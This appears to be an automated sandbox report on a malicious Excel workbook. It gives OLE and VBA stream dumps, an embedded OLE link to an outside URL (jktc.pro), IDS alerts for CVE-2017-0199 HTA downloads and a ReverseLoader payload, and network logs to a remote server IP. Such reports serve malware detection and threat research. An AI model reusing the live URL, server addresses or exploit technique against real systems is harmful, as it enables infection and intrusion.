                                                                        Data ASCII:I D = " { 1 9 C 9 4 3 8 D - F 0 7 5 - 4 2 6 8 - 9 E 6 E - 7 B 8 A E 6 6 D 5 A 0 F } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " C D C F 3 A 0 A C A D 2 C E D 2 C E D 2 C E D 2 C E " . . D P B = " 9 9 9 B 6 E 9 3 6 F 9
                                                                        Data Raw:49 44 3d 22 7b 31 39 43 39 34 33 38 44 2d 46 30 37 35 2d 34 32 36 38 2d 39 45 36 45 2d 37 42 38 41 45 36 36 44 35 41 30 46 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
                                                                        General
                                                                        Stream Path:MBD00609F23/MBD007203CB/_VBA_PROJECT_CUR/PROJECTwm
                                                                        CLSID:
                                                                        File Type:data
                                                                        Stream Size:83
                                                                        Entropy:3.0672749060249043
                                                                        Base64 Encoded:False
                                                                        Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . . .
                                                                        Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 00 00
                                                                        General
                                                                        Stream Path:MBD00609F23/MBD007203CB/_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                                                                        CLSID:
                                                                        File Type:data
                                                                        Stream Size:2486
                                                                        Entropy:3.9244127831265385
                                                                        Base64 Encoded:False
                                                                        Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
                                                                        Data Raw:cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
                                                                        General
                                                                        Stream Path:MBD00609F23/MBD007203CB/_VBA_PROJECT_CUR/VBA/dir
                                                                        CLSID:
                                                                        File Type:data
                                                                        Stream Size:536
                                                                        Entropy:6.330646364694152
                                                                        Base64 Encoded:True
                                                                        Data ASCII:. . . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . C W ] i . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 .
                                                                        Data Raw:01 14 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 43 57 5d 69 12 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47
                                                                        General
                                                                        Stream Path:MBD00609F23/MBD00726B69/\x1CompObj
                                                                        CLSID:
                                                                        File Type:data
                                                                        Stream Size:114
                                                                        Entropy:4.219515110876372
                                                                        Base64 Encoded:False
                                                                        Data ASCII:. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
                                                                        Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 30 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 0f 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 31 32 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                        General
                                                                        Stream Path:MBD00609F23/MBD00726B69/Package
                                                                        CLSID:
                                                                        File Type:Microsoft Excel 2007+
                                                                        Stream Size:26242
                                                                        Entropy:7.635424485665502
                                                                        Base64 Encoded:True
                                                                        Data ASCII:P K . . . . . . . . . . ! . & . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                        Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 a1 26 fd 83 92 01 00 00 ae 05 00 00 13 00 e0 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 dc 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                        General
                                                                        Stream Path:MBD00609F23/Workbook
                                                                        CLSID:
                                                                        File Type:Applesoft BASIC program data, first line number 16
                                                                        Stream Size:283872
                                                                        Entropy:7.743278150467805
                                                                        Base64 Encoded:True
                                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . a . . . . . . . . = . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . b . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . H < l - 9 . . . . . . . X . @ . . . . . . . . . .
                                                                        Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                        General
                                                                        Stream Path:MBD00609F24/\x1CompObj
                                                                        CLSID:
                                                                        File Type:data
                                                                        Stream Size:99
                                                                        Entropy:3.631242196770981
                                                                        Base64 Encoded:False
                                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
                                                                        Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                        General
                                                                        Stream Path:MBD00609F24/Package
                                                                        CLSID:
                                                                        File Type:Microsoft Excel 2007+
                                                                        Stream Size:45934
                                                                        Entropy:7.5587990853484195
                                                                        Base64 Encoded:True
                                                                        Data ASCII:P K . . . . . . . . . . ! . . ~ . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                        Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 8c e9 8c 8c 7e 01 00 00 8c 05 00 00 13 00 dc 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 d8 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                        General
                                                                        Stream Path:MBD00609F25/\x1Ole
                                                                        CLSID:
                                                                        File Type:data
                                                                        Stream Size:858
                                                                        Entropy:5.617491941326951
                                                                        Base64 Encoded:False
                                                                        Data ASCII:. . . . c \\ . . . . . . . . . . . . . . . . y . . . K . . . . h . t . t . p . s . : . / . / . j . k . t . c . . . p . r . o . / . 9 . 4 . W . 7 . 2 . u . ? . & . d . e . f . i . c . i . t . = . e . x . u . l . t . a . n . t . & . b . r . e . a . t . h . = . w . i . l . l . i . n . g . & . a . n . a . l . y . s . t . = . l . u . x . u . r . i . a . n . t . & . p . l . o . t . = . e . t . h . e . r . e . a . l . & . e . g . g . p . l . a . n . t . = . g . r . e . e . n . & . t . e . a . . . ! ( . ! ' . . A q
                                                                        Data Raw:01 00 00 02 b9 8f b2 63 5c 89 bf 19 00 00 00 00 00 00 00 00 00 00 00 00 ca 01 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b c6 01 00 00 68 00 74 00 74 00 70 00 73 00 3a 00 2f 00 2f 00 6a 00 6b 00 74 00 63 00 2e 00 70 00 72 00 6f 00 2f 00 39 00 34 00 57 00 37 00 32 00 75 00 3f 00 26 00 64 00 65 00 66 00 69 00 63 00 69 00 74 00 3d 00 65 00 78 00 75 00 6c 00 74 00 61 00 6e 00
                                                                        General
                                                                        Stream Path:Workbook
                                                                        CLSID:
                                                                        File Type:Applesoft BASIC program data, first line number 16
                                                                        Stream Size:297185
                                                                        Entropy:7.998571982073725
                                                                        Base64 Encoded:True
                                                                        Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . W O . . t 7 E . O . @ # $ . j . . . . . = h . . . . . . . . . . . \\ . p . S . . . # 8 w P ' _ 9 R . u . . . . . d ~ = t ' @ 6 . z . & Q m < _ 4 . T L A | * 6 l > J . G j . } v O . . J @ . L n . { d u . c r 5 4 . d B . . . . a . . . d . . . = . . . M . . . . v u . D . . . . . . r . . . . A . . . . y r . . . . . . . . M . . . . c = . . . [ d ) d { F @ . . . O . . . l " . . . . . . . . . . . . . r . 1 . . . 1 l b . e . - F . = x . 3 . b 1 . . . 7 < . . ~
                                                                        Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 a8 57 4f 03 e4 af 19 eb d0 74 37 82 8f 9d 45 96 c4 a2 90 4f dd e0 16 40 23 b8 b0 95 24 12 ec a3 6a a4 d7 b1 18 94 14 d1 9e c0 bc a0 01 3d 9e 68 e1 00 02 00 b0 04 c1 00 02 00 c2 1f e2 00 00 00 5c 00 70 00 53 7f 12 11 df 23 38 77 50 a0 e1 27 5f e2 39 8a b5 9a df f0 52 9d da 81 b0 75 14 da 8f 0f
                                                                        General
                                                                        Stream Path:_VBA_PROJECT_CUR/PROJECT
                                                                        CLSID:
                                                                        File Type:ASCII text, with CRLF line terminators
                                                                        Stream Size:529
                                                                        Entropy:5.246248221352381
                                                                        Base64 Encoded:True
                                                                        Data ASCII:I D = " { 0 E 5 6 6 0 2 E - 3 9 D 7 - 4 B C B - 9 1 8 B - 5 0 D E 4 F 4 B B 8 7 7 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " E 7 E 5 1 2 C 9 3 6 C F 4 D D 3 4
                                                                        Data Raw:49 44 3d 22 7b 30 45 35 36 36 30 32 45 2d 33 39 44 37 2d 34 42 43 42 2d 39 31 38 42 2d 35 30 44 45 34 46 34 42 42 38 37 37 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
                                                                        General
                                                                        Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                                                                        CLSID:
                                                                        File Type:data
                                                                        Stream Size:104
                                                                        Entropy:3.0488640812019017
                                                                        Base64 Encoded:False
                                                                        Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
                                                                        Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00
                                                                        General
                                                                        Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                                                                        CLSID:
                                                                        File Type:data
                                                                        Stream Size:2644
                                                                        Entropy:3.979944087404938
                                                                        Base64 Encoded:False
                                                                        Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
                                                                        Data Raw:cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                        2024-12-12T21:38:14.640106+01002024449ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl1192.168.2.224916223.95.235.2980TCP
                                                                        2024-12-12T21:38:14.641633+01002024197ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199)123.95.235.2980192.168.2.2249162TCP
                                                                        2024-12-12T21:38:19.563688+01002024449ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl1192.168.2.224916423.95.235.2980TCP
                                                                        2024-12-12T21:38:19.564144+01002024197ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199)123.95.235.2980192.168.2.2249164TCP
                                                                        2024-12-12T21:38:27.133480+01002858795ETPRO MALWARE ReverseLoader Payload Request (GET) M21192.168.2.224916523.95.235.2980TCP
                                                                        2024-12-12T21:38:39.254404+01002049038ET MALWARE ReverseLoader Reverse Base64 Loader In Image M21151.101.1.137443192.168.2.2249167TCP
                                                                        2024-12-12T21:38:40.302835+01002024449ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl1192.168.2.224917123.95.235.2980TCP
                                                                        2024-12-12T21:38:56.429519+01002049038ET MALWARE ReverseLoader Reverse Base64 Loader In Image M21151.101.65.137443192.168.2.2249172TCP
                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Dec 12, 2024 21:38:11.263948917 CET49161443192.168.2.22104.21.34.183
                                                                        Dec 12, 2024 21:38:11.263987064 CET44349161104.21.34.183192.168.2.22
                                                                        Dec 12, 2024 21:38:11.264045000 CET49161443192.168.2.22104.21.34.183
                                                                        Dec 12, 2024 21:38:11.457161903 CET49161443192.168.2.22104.21.34.183
                                                                        Dec 12, 2024 21:38:11.457226038 CET44349161104.21.34.183192.168.2.22
                                                                        Dec 12, 2024 21:38:12.682245970 CET44349161104.21.34.183192.168.2.22
                                                                        Dec 12, 2024 21:38:12.682359934 CET49161443192.168.2.22104.21.34.183
                                                                        Dec 12, 2024 21:38:12.688195944 CET49161443192.168.2.22104.21.34.183
                                                                        Dec 12, 2024 21:38:12.688215971 CET44349161104.21.34.183192.168.2.22
                                                                        Dec 12, 2024 21:38:12.688523054 CET44349161104.21.34.183192.168.2.22
                                                                        Dec 12, 2024 21:38:12.688574076 CET49161443192.168.2.22104.21.34.183
                                                                        Dec 12, 2024 21:38:12.791457891 CET49161443192.168.2.22104.21.34.183
                                                                        Dec 12, 2024 21:38:12.839337111 CET44349161104.21.34.183192.168.2.22
                                                                        Dec 12, 2024 21:38:13.400496960 CET44349161104.21.34.183192.168.2.22
                                                                        Dec 12, 2024 21:38:13.400562048 CET49161443192.168.2.22104.21.34.183
                                                                        Dec 12, 2024 21:38:13.400590897 CET44349161104.21.34.183192.168.2.22
                                                                        Dec 12, 2024 21:38:13.400608063 CET44349161104.21.34.183192.168.2.22
                                                                        Dec 12, 2024 21:38:13.400635004 CET49161443192.168.2.22104.21.34.183
                                                                        Dec 12, 2024 21:38:13.400667906 CET49161443192.168.2.22104.21.34.183
                                                                        Dec 12, 2024 21:38:13.402075052 CET49161443192.168.2.22104.21.34.183
                                                                        Dec 12, 2024 21:38:13.402090073 CET44349161104.21.34.183192.168.2.22
                                                                        Dec 12, 2024 21:38:13.409921885 CET4916280192.168.2.2223.95.235.29
                                                                        Dec 12, 2024 21:38:13.529797077 CET804916223.95.235.29192.168.2.22
                                                                        Dec 12, 2024 21:38:13.529875040 CET4916280192.168.2.2223.95.235.29
                                                                        Dec 12, 2024 21:38:13.530086040 CET4916280192.168.2.2223.95.235.29
                                                                        Dec 12, 2024 21:38:13.649861097 CET804916223.95.235.29192.168.2.22
                                                                        Dec 12, 2024 21:38:14.638873100 CET804916223.95.235.29192.168.2.22
                                                                        Dec 12, 2024 21:38:14.639991999 CET804916223.95.235.29192.168.2.22
                                                                        Dec 12, 2024 21:38:14.640005112 CET804916223.95.235.29192.168.2.22
                                                                        Dec 12, 2024 21:38:14.640105963 CET4916280192.168.2.2223.95.235.29
                                                                        Dec 12, 2024 21:38:14.641633034 CET804916223.95.235.29192.168.2.22
                                                                        Dec 12, 2024 21:38:14.641645908 CET804916223.95.235.29192.168.2.22
                                                                        Dec 12, 2024 21:38:14.641696930 CET4916280192.168.2.2223.95.235.29
                                                                        Dec 12, 2024 21:38:14.647404909 CET804916223.95.235.29192.168.2.22
                                                                        Dec 12, 2024 21:38:14.647419930 CET804916223.95.235.29192.168.2.22
                                                                        Dec 12, 2024 21:38:14.647485018 CET4916280192.168.2.2223.95.235.29
                                                                        Dec 12, 2024 21:38:14.647577047 CET804916223.95.235.29192.168.2.22
                                                                        Dec 12, 2024 21:38:14.647589922 CET804916223.95.235.29192.168.2.22
                                                                        Dec 12, 2024 21:38:14.647620916 CET4916280192.168.2.2223.95.235.29
                                                                        Dec 12, 2024 21:38:14.647631884 CET4916280192.168.2.2223.95.235.29
                                                                        Dec 12, 2024 21:38:14.649627924 CET804916223.95.235.29192.168.2.22
                                                                        Dec 12, 2024 21:38:14.650719881 CET4916280192.168.2.2223.95.235.29
                                                                        Dec 12, 2024 21:38:14.684787035 CET4916280192.168.2.2223.95.235.29
                                                                        Dec 12, 2024 21:38:14.760844946 CET804916223.95.235.29192.168.2.22
                                                                        Dec 12, 2024 21:38:14.760864019 CET804916223.95.235.29192.168.2.22
                                                                        Dec 12, 2024 21:38:14.760910988 CET4916280192.168.2.2223.95.235.29
                                                                        Dec 12, 2024 21:38:14.760910988 CET4916280192.168.2.2223.95.235.29
                                                                        Dec 12, 2024 21:38:14.833808899 CET804916223.95.235.29192.168.2.22
                                                                        Dec 12, 2024 21:38:14.833830118 CET804916223.95.235.29192.168.2.22
                                                                        Dec 12, 2024 21:38:14.833888054 CET4916280192.168.2.2223.95.235.29
                                                                        Dec 12, 2024 21:38:14.835218906 CET804916223.95.235.29192.168.2.22
                                                                        Dec 12, 2024 21:38:14.835232019 CET804916223.95.235.29192.168.2.22
                                                                        Dec 12, 2024 21:38:14.835270882 CET4916280192.168.2.2223.95.235.29
                                                                        Dec 12, 2024 21:38:14.843631983 CET804916223.95.235.29192.168.2.22
                                                                        Dec 12, 2024 21:38:14.844459057 CET4916280192.168.2.2223.95.235.29
                                                                        Dec 12, 2024 21:38:14.846401930 CET804916223.95.235.29192.168.2.22
                                                                        Dec 12, 2024 21:38:14.846452951 CET4916280192.168.2.2223.95.235.29
                                                                        Dec 12, 2024 21:38:14.846745014 CET804916223.95.235.29192.168.2.22
                                                                        Dec 12, 2024 21:38:14.846786022 CET4916280192.168.2.2223.95.235.29
                                                                        Dec 12, 2024 21:38:14.854711056 CET804916223.95.235.29192.168.2.22
                                                                        Dec 12, 2024 21:38:14.855137110 CET804916223.95.235.29192.168.2.22
                                                                        Dec 12, 2024 21:38:14.855189085 CET4916280192.168.2.2223.95.235.29
                                                                        Dec 12, 2024 21:38:14.865624905 CET804916223.95.235.29192.168.2.22
                                                                        Dec 12, 2024 21:38:14.865643978 CET804916223.95.235.29192.168.2.22
                                                                        Dec 12, 2024 21:38:14.865695000 CET4916280192.168.2.2223.95.235.29
                                                                        Dec 12, 2024 21:38:14.865784883 CET4916280192.168.2.2223.95.235.29
                                                                        Dec 12, 2024 21:38:14.872741938 CET804916223.95.235.29192.168.2.22
                                                                        Dec 12, 2024 21:38:14.872757912 CET804916223.95.235.29192.168.2.22
                                                                        Dec 12, 2024 21:38:14.872805119 CET4916280192.168.2.2223.95.235.29
                                                                        Dec 12, 2024 21:38:14.881717920 CET804916223.95.235.29192.168.2.22
                                                                        Dec 12, 2024 21:38:14.881731987 CET804916223.95.235.29192.168.2.22
                                                                        Dec 12, 2024 21:38:14.881779909 CET4916280192.168.2.2223.95.235.29
                                                                        Dec 12, 2024 21:38:14.888540983 CET804916223.95.235.29192.168.2.22
                                                                        Dec 12, 2024 21:38:14.888824940 CET804916223.95.235.29192.168.2.22
                                                                        Dec 12, 2024 21:38:14.888892889 CET4916280192.168.2.2223.95.235.29
                                                                        Dec 12, 2024 21:38:14.896732092 CET804916223.95.235.29192.168.2.22
                                                                        Dec 12, 2024 21:38:14.896791935 CET4916280192.168.2.2223.95.235.29
                                                                        Dec 12, 2024 21:38:14.897192001 CET804916223.95.235.29192.168.2.22
                                                                        Dec 12, 2024 21:38:14.897245884 CET4916280192.168.2.2223.95.235.29
                                                                        Dec 12, 2024 21:38:14.905030966 CET804916223.95.235.29192.168.2.22
                                                                        Dec 12, 2024 21:38:14.905164003 CET4916280192.168.2.2223.95.235.29
                                                                        Dec 12, 2024 21:38:14.905719042 CET804916223.95.235.29192.168.2.22
                                                                        Dec 12, 2024 21:38:14.905767918 CET4916280192.168.2.2223.95.235.29
                                                                        Dec 12, 2024 21:38:14.913448095 CET804916223.95.235.29192.168.2.22
                                                                        Dec 12, 2024 21:38:14.913516045 CET4916280192.168.2.2223.95.235.29
                                                                        Dec 12, 2024 21:38:15.022770882 CET804916223.95.235.29192.168.2.22
                                                                        Dec 12, 2024 21:38:15.022834063 CET4916280192.168.2.2223.95.235.29
                                                                        Dec 12, 2024 21:38:15.025500059 CET804916223.95.235.29192.168.2.22
                                                                        Dec 12, 2024 21:38:15.025516033 CET804916223.95.235.29192.168.2.22
                                                                        Dec 12, 2024 21:38:15.025547981 CET4916280192.168.2.2223.95.235.29
                                                                        Dec 12, 2024 21:38:15.025573969 CET4916280192.168.2.2223.95.235.29
                                                                        Dec 12, 2024 21:38:15.026693106 CET804916223.95.235.29192.168.2.22
                                                                        Dec 12, 2024 21:38:15.026734114 CET4916280192.168.2.2223.95.235.29
                                                                        Dec 12, 2024 21:38:15.030600071 CET804916223.95.235.29192.168.2.22
                                                                        Dec 12, 2024 21:38:15.030616999 CET804916223.95.235.29192.168.2.22
                                                                        Dec 12, 2024 21:38:15.030642986 CET4916280192.168.2.2223.95.235.29
                                                                        Dec 12, 2024 21:38:15.030661106 CET4916280192.168.2.2223.95.235.29
                                                                        Dec 12, 2024 21:38:15.034720898 CET804916223.95.235.29192.168.2.22
                                                                        Dec 12, 2024 21:38:15.034770012 CET4916280192.168.2.2223.95.235.29
                                                                        Dec 12, 2024 21:38:15.038705111 CET804916223.95.235.29192.168.2.22
                                                                        Dec 12, 2024 21:38:15.038748980 CET4916280192.168.2.2223.95.235.29
                                                                        Dec 12, 2024 21:38:15.042668104 CET804916223.95.235.29192.168.2.22
                                                                        Dec 12, 2024 21:38:15.042685986 CET804916223.95.235.29192.168.2.22
                                                                        Dec 12, 2024 21:38:15.042716980 CET4916280192.168.2.2223.95.235.29
                                                                        Dec 12, 2024 21:38:15.042742968 CET4916280192.168.2.2223.95.235.29
                                                                        Dec 12, 2024 21:38:15.046731949 CET804916223.95.235.29192.168.2.22
                                                                        Dec 12, 2024 21:38:15.046746969 CET804916223.95.235.29192.168.2.22
                                                                        Dec 12, 2024 21:38:15.046797991 CET4916280192.168.2.2223.95.235.29
                                                                        Dec 12, 2024 21:38:15.049772978 CET804916223.95.235.29192.168.2.22
                                                                        Dec 12, 2024 21:38:15.049789906 CET804916223.95.235.29192.168.2.22
                                                                        Dec 12, 2024 21:38:15.049834013 CET4916280192.168.2.2223.95.235.29
                                                                        Dec 12, 2024 21:38:15.050692081 CET4916280192.168.2.2223.95.235.29
                                                                        Dec 12, 2024 21:38:15.054713964 CET804916223.95.235.29192.168.2.22
                                                                        Dec 12, 2024 21:38:15.054730892 CET804916223.95.235.29192.168.2.22
                                                                        Dec 12, 2024 21:38:15.054774046 CET4916280192.168.2.2223.95.235.29
                                                                        Dec 12, 2024 21:38:15.054792881 CET4916280192.168.2.2223.95.235.29
                                                                        Dec 12, 2024 21:38:15.058715105 CET804916223.95.235.29192.168.2.22
                                                                        Dec 12, 2024 21:38:15.058792114 CET4916280192.168.2.2223.95.235.29
                                                                        Dec 12, 2024 21:38:15.062714100 CET804916223.95.235.29192.168.2.22
                                                                        Dec 12, 2024 21:38:15.062763929 CET4916280192.168.2.2223.95.235.29
